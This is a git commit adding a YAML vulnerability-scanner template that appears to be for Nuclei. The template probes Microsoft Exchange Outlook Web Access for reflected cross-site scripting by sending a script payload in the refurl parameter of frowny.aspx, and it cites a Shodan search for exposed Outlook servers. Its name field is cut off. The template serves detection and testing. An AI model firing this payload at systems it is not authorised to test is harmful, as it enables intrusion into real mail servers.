Create ms-exchange-server-reflected-xss.yaml
parent
45a15ecf3e
commit
5072dbbcbb
|
@ -0,0 +1,28 @@
|
||||||
|
id: ms-exchange-server-reflected-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MS Exchange Server XSS (
|
||||||
|
author: infosecsanyam
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Microsoft Exchange Server XSS.
|
||||||
|
reference: |
|
||||||
|
- https://www.shodan.io/search?query=http.title%3A%22Outlook%22
|
||||||
|
tags: exchangeserver,owa,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'alert(document.domain)//'
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
||||||
|
|
Loading…
Reference in New Issue